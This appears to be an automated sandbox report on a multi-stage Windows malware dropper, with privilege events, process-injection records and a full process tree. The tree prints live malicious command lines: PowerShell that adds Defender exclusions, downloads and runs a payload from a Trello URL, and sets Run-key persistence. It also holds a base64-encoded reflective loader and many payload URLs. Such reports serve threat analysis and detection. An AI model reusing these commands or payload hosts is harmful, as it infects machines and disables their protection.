3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exehttpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exepowershell.exehttpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exepowershell.exepowershell.exehttpfiles.offshore.catfxYvCG6c.exe.exepowershell.exepowershell.exehttpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exepowershell.exepowershell.exe$embr-client.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exehttpsfile-drop.ccD5d2a75Tester.exe.exehttpsfile-drop.ccD24e534svchost.exe.exevssvc.exehttpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exepowershell.exepowershell.exesvchost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe
Token: SeDebugPrivilege	3156	httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe
Token: SeDebugPrivilege	2548	powershell.exe
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	4776	powershell.exe
Token: SeDebugPrivilege	4652	powershell.exe
Token: SeDebugPrivilege	4336	taskkill.exe
Token: SeDebugPrivilege	1576	powershell.exe
Token: SeDebugPrivilege	4336	httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe
Token: SeDebugPrivilege	1912	powershell.exe
Token: SeDebugPrivilege	2256	powershell.exe
Token: SeDebugPrivilege	5300	httpfiles.offshore.catfxYvCG6c.exe.exe
Token: SeDebugPrivilege	5384	powershell.exe
Token: SeDebugPrivilege	5500	powershell.exe
Token: SeDebugPrivilege	5868	httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Token: SeImpersonatePrivilege	5868	httpsgithub.comqtkitedefender-controlreleasesdownloadv1.5disable-defender.exe.exe
Token: SeDebugPrivilege	5844	powershell.exe
Token: SeDebugPrivilege	6088	powershell.exe
Token: SeDebugPrivilege	1608	$embr-client.exe
Token: SeDebugPrivilege	5684	powershell.exe
Token: SeDebugPrivilege	2788	powershell.exe
Token: SeDebugPrivilege	2316	powershell.exe
Token: SeDebugPrivilege	5888	powershell.exe
Token: SeDebugPrivilege	5696	powershell.exe
Token: SeDebugPrivilege	5680	httpsfile-drop.ccD5d2a75Tester.exe.exe
Token: SeDebugPrivilege	6124	httpsfile-drop.ccD24e534svchost.exe.exe
Token: SeBackupPrivilege	5712	vssvc.exe
Token: SeRestorePrivilege	5712	vssvc.exe
Token: SeAuditPrivilege	5712	vssvc.exe
Token: SeDebugPrivilege	2004	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: SeDebugPrivilege	4576	powershell.exe
Token: SeDebugPrivilege	6124	httpsfile-drop.ccD24e534svchost.exe.exe
Token: SeDebugPrivilege	6056	powershell.exe
Token: SeDebugPrivilege	5580	svchost.exe
Token: SeDebugPrivilege	3076	svchost.exe
Token: SeDebugPrivilege	3076	svchost.exe
Token: 33	2004	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: SeIncBasePriorityPrivilege	2004	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: SeDebugPrivilege	3076	svchost.exe
Token: 33	2004	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: SeIncBasePriorityPrivilege	2004	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: 33	2004	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: SeIncBasePriorityPrivilege	2004	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: 33	2004	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: SeIncBasePriorityPrivilege	2004	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: 33	2004	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: SeIncBasePriorityPrivilege	2004	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: 33	2004	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe
Token: SeIncBasePriorityPrivilege	2004	httpsdownload.oxy.stgetce736be0b00ea25a9155101e47dc9fd9Client.exe.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

httpsfile-drop.ccD24e534svchost.exe.exesvchost.exe

pid process

6124 httpsfile-drop.ccD24e534svchost.exe.exe
3076 svchost.exe

pid	process
6124	httpsfile-drop.ccD24e534svchost.exe.exe
3076	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exehttpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.execmd.exehttp185.196.8.137tesgs.exe.exewscript.exehttp185.215.113.66pei.exe.execmd.exehttp185.215.113.66newtpp.exe.exepowershell.exehttpguatemalacayerealestate.combatushkainte.exe.execmd.exe

description	pid	process	target process
PID 928 wrote to memory of 1968	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	http185.215.113.66newtpp.exe.exe
PID 928 wrote to memory of 1968	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	http185.215.113.66newtpp.exe.exe
PID 928 wrote to memory of 1968	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	http185.215.113.66newtpp.exe.exe
PID 928 wrote to memory of 3156	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe
PID 928 wrote to memory of 3156	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe
PID 928 wrote to memory of 3156	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe
PID 928 wrote to memory of 2724	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	http185.215.113.66pei.exe.exe
PID 928 wrote to memory of 2724	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	http185.215.113.66pei.exe.exe
PID 928 wrote to memory of 2724	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	http185.215.113.66pei.exe.exe
PID 928 wrote to memory of 3580	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	http185.196.8.137tesgs.exe.exe
PID 928 wrote to memory of 3580	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	http185.196.8.137tesgs.exe.exe
PID 928 wrote to memory of 3580	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	http185.196.8.137tesgs.exe.exe
PID 928 wrote to memory of 3076	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	httpguatemalacayerealestate.combatushkainte.exe.exe
PID 928 wrote to memory of 3076	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	httpguatemalacayerealestate.combatushkainte.exe.exe
PID 928 wrote to memory of 3076	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	httpguatemalacayerealestate.combatushkainte.exe.exe
PID 3156 wrote to memory of 1536	3156	httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe	cmd.exe
PID 3156 wrote to memory of 1536	3156	httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe	cmd.exe
PID 3156 wrote to memory of 1536	3156	httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe	cmd.exe
PID 1536 wrote to memory of 2548	1536	cmd.exe	powershell.exe
PID 1536 wrote to memory of 2548	1536	cmd.exe	powershell.exe
PID 1536 wrote to memory of 2548	1536	cmd.exe	powershell.exe
PID 928 wrote to memory of 4552	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	httpra-ftp.ruimages1.jpg.exe
PID 928 wrote to memory of 4552	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	httpra-ftp.ruimages1.jpg.exe
PID 928 wrote to memory of 4552	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	httpra-ftp.ruimages1.jpg.exe
PID 928 wrote to memory of 3528	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	http185.215.113.46costrandom.exe.exe
PID 928 wrote to memory of 3528	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	http185.215.113.46costrandom.exe.exe
PID 928 wrote to memory of 3528	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	http185.215.113.46costrandom.exe.exe
PID 928 wrote to memory of 3728	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	http185.215.113.46negravegan.exe.exe
PID 928 wrote to memory of 3728	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	http185.215.113.46negravegan.exe.exe
PID 928 wrote to memory of 3728	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	http185.215.113.46negravegan.exe.exe
PID 3580 wrote to memory of 2508	3580	http185.196.8.137tesgs.exe.exe	WerFault.exe
PID 3580 wrote to memory of 2508	3580	http185.196.8.137tesgs.exe.exe	WerFault.exe
PID 3580 wrote to memory of 2508	3580	http185.196.8.137tesgs.exe.exe	WerFault.exe
PID 2508 wrote to memory of 1364	2508	wscript.exe	cmd.exe
PID 2508 wrote to memory of 1364	2508	wscript.exe	cmd.exe
PID 2508 wrote to memory of 1364	2508	wscript.exe	cmd.exe
PID 2724 wrote to memory of 884	2724	http185.215.113.66pei.exe.exe	3013831348.exe
PID 2724 wrote to memory of 884	2724	http185.215.113.66pei.exe.exe	3013831348.exe
PID 2724 wrote to memory of 884	2724	http185.215.113.66pei.exe.exe	3013831348.exe
PID 1364 wrote to memory of 2692	1364	cmd.exe	powershell.exe
PID 1364 wrote to memory of 2692	1364	cmd.exe	powershell.exe
PID 1364 wrote to memory of 2692	1364	cmd.exe	powershell.exe
PID 928 wrote to memory of 780	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	httproundcube.custommarinesvcs.comklounada.exe.exe
PID 928 wrote to memory of 780	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	httproundcube.custommarinesvcs.comklounada.exe.exe
PID 928 wrote to memory of 780	928	3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe	httproundcube.custommarinesvcs.comklounada.exe.exe
PID 1968 wrote to memory of 3824	1968	http185.215.113.66newtpp.exe.exe	1002628022.exe
PID 1968 wrote to memory of 3824	1968	http185.215.113.66newtpp.exe.exe	1002628022.exe
PID 1968 wrote to memory of 3824	1968	http185.215.113.66newtpp.exe.exe	1002628022.exe
PID 1364 wrote to memory of 4776	1364	cmd.exe	Conhost.exe
PID 1364 wrote to memory of 4776	1364	cmd.exe	Conhost.exe
PID 1364 wrote to memory of 4776	1364	cmd.exe	Conhost.exe
PID 2548 wrote to memory of 4652	2548	powershell.exe	powershell.exe
PID 2548 wrote to memory of 4652	2548	powershell.exe	powershell.exe
PID 2548 wrote to memory of 4652	2548	powershell.exe	powershell.exe
PID 3076 wrote to memory of 1984	3076	httpguatemalacayerealestate.combatushkainte.exe.exe	cmd.exe
PID 3076 wrote to memory of 1984	3076	httpguatemalacayerealestate.combatushkainte.exe.exe	cmd.exe
PID 3076 wrote to memory of 1984	3076	httpguatemalacayerealestate.combatushkainte.exe.exe	cmd.exe
PID 1984 wrote to memory of 4336	1984	cmd.exe	httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe
PID 1984 wrote to memory of 4336	1984	cmd.exe	httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe
PID 1984 wrote to memory of 4336	1984	cmd.exe	httpstrello.com1cards660a48f3ed8f660125aa4d31attachments66153df02cfa1d750cac2cfcdownloadcccc.exe.exe
PID 1968 wrote to memory of 3928	1968	http185.215.113.66newtpp.exe.exe	2770021532.exe
PID 1968 wrote to memory of 3928	1968	http185.215.113.66newtpp.exe.exe	2770021532.exe
PID 1968 wrote to memory of 3928	1968	http185.215.113.66newtpp.exe.exe	2770021532.exe
PID 2548 wrote to memory of 1576	2548	powershell.exe	powershell.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2524

C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5888

C:\Users\Admin\AppData\Local\Temp\3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe
"C:\Users\Admin\AppData\Local\Temp\3cea805f1396df15bdbcd4317388a046a41a6079dba04576a58ba7b2c812338a.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:928

C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http185.215.113.66pei.exe.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2724

C:\Users\Admin\AppData\Local\Temp\3013831348.exe
C:\Users\Admin\AppData\Local\Temp\3013831348.exe
3⤵
- Executes dropped EXE
PID:884

C:\Users\Admin\AppData\Local\Temp\http185.215.113.66newtpp.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http185.215.113.66newtpp.exe.exe"
2⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1968

C:\Users\Admin\AppData\Local\Temp\1002628022.exe
C:\Users\Admin\AppData\Local\Temp\1002628022.exe
3⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
- Suspicious behavior: SetClipboardViewer
PID:3824

C:\Users\Admin\AppData\Local\Temp\275354733.exe
C:\Users\Admin\AppData\Local\Temp\275354733.exe
4⤵
- Executes dropped EXE
PID:5488

C:\Users\Admin\AppData\Local\Temp\667029277.exe
C:\Users\Admin\AppData\Local\Temp\667029277.exe
4⤵
- Executes dropped EXE
PID:5244

C:\Users\Admin\AppData\Local\Temp\3216420798.exe
C:\Users\Admin\AppData\Local\Temp\3216420798.exe
4⤵
- Executes dropped EXE
PID:3840

C:\Users\Admin\AppData\Local\Temp\2770021532.exe
C:\Users\Admin\AppData\Local\Temp\2770021532.exe
3⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Drops file in Windows directory
PID:3928

C:\Users\Admin\AppData\Local\Temp\1793913919.exe
C:\Users\Admin\AppData\Local\Temp\1793913919.exe
3⤵
- Executes dropped EXE
PID:5180

C:\Users\Admin\AppData\Local\Temp\2321415439.exe
C:\Users\Admin\AppData\Local\Temp\2321415439.exe
3⤵
- Executes dropped EXE
PID:4584

C:\Users\Admin\AppData\Local\Temp\httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe
"C:\Users\Admin\AppData\Local\Temp\httpstrello.com1cards660a48f3ed8f660125aa4d31attachments6615472237acc15ca27cb4addownload58888885.exe.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3156

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C powershell.exe -Command Add-MpPreference -ExclusionPath %localappdata%; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value %localappdata%'\RuntimeBroker2.exe'; timeout /t 1 >nul;start RuntimeBroker2.exe;
3⤵
- Suspicious use of WriteProcessMemory
PID:1536

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local'\RuntimeBroker2.exe'; timeout /t 1 ;start RuntimeBroker2.exe;
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2548

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RuntimeBroker2.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4652

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1576

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local\RuntimeBroker2.exe
5⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1912

C:\Windows\SysWOW64\timeout.exe
"C:\Windows\system32\timeout.exe" /t 1
5⤵
- Delays execution with timeout.exe
PID:5560

C:\Users\Admin\AppData\Local\RuntimeBroker2.exe
"C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"
5⤵
- Executes dropped EXE
PID:4320

C:\Users\Admin\AppData\Local\Temp\http185.196.8.137tesgs.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http185.196.8.137tesgs.exe.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3580

C:\Windows\SysWOW64\wscript.exe
"wscript.exe" "C:\Users\Admin\start.vbs"
3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:1364

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCiRlbmNvZGVkQXJyYXkgPSBAKDE1OSwyMjAsMjM4LDIzOCwyMjQsMjMyLDIyMSwyMzEsMjQ0LDE2OSwxOTIsMjMzLDIzOSwyMzcsMjQ0LDIwMywyMzQsMjI4LDIzMywyMzksMTY5LDE5NiwyMzMsMjQxLDIzNCwyMzAsMjI0LDE2MywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NywxNTksMjMzLDI0MCwyMzEsMjMxLDE2NCwxODIpDQokZGVjb2RlZFN0cmluZyA9IENvbnZlcnQtQXNjaWlUb1N0cmluZyAkZW5jb2RlZEFycmF5DQoNCg0KJGZpbGVQYXRoID0gSm9pbi1QYXRoICRlbnY6VXNlclByb2ZpbGUgIlVuZExkbC5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\UndLdl.ps1' -Encoding UTF8"
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\UndLdl.ps1"
5⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4776

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:5572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 612
7⤵
- Program crash
PID:5484

C:\Users\Admin\AppData\Local\Temp\httpguatemalacayerealestate.combatushkainte.exe.exe
"C:\Users\Admin\AppData\Local\Temp\httpguatemalacayerealestate.combatushkainte.exe.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 740
3⤵
- Program crash
PID:3888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 748
3⤵
- Program crash
PID:1456

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 824
3⤵
- Program crash
PID:2124

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 784
3⤵
- Program crash
PID:2636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 960
3⤵
- Program crash
PID:2256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 992
3⤵
- Program crash
PID:3632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 1332
3⤵
- Program crash
PID:4448

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "httpguatemalacayerealestate.combatushkainte.exe.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\httpguatemalacayerealestate.combatushkainte.exe.exe" & exit
3⤵
- Suspicious use of WriteProcessMemory
PID:1984

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "httpguatemalacayerealestate.combatushkainte.exe.exe" /f
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4336

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3076 -s 1364
3⤵
- Program crash
PID:3928

C:\Users\Admin\AppData\Local\Temp\httpra-ftp.ruimages1.jpg.exe
"C:\Users\Admin\AppData\Local\Temp\httpra-ftp.ruimages1.jpg.exe"
2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
PID:4552

C:\Users\Admin\AppData\Local\Temp\http185.215.113.46costrandom.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http185.215.113.46costrandom.exe.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3528

C:\Users\Admin\AppData\Local\Temp\http185.215.113.46negravegan.exe.exe
"C:\Users\Admin\AppData\Local\Temp\http185.215.113.46negravegan.exe.exe"
2⤵
- Executes dropped EXE
PID:3728

C:\Users\Admin\AppData\Local\Temp\httproundcube.custommarinesvcs.comklounada.exe.exe
"C:\Users\Admin\AppData\Local\Temp\httproundcube.custommarinesvcs.comklounada.exe.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:780

